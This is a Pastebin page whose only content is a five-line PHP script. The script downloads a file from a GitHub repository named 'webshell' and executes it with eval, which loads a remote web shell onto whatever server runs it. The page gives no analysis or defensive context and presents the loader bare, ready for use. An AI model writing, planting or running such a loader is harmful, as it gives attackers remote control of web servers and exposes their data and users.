Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $file = file_get_contents('https://raw.githubusercontent.com/exploit-haxor/webshell/main/mydb@.php');
- $content = eval("?>$file");
- echo $content;
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement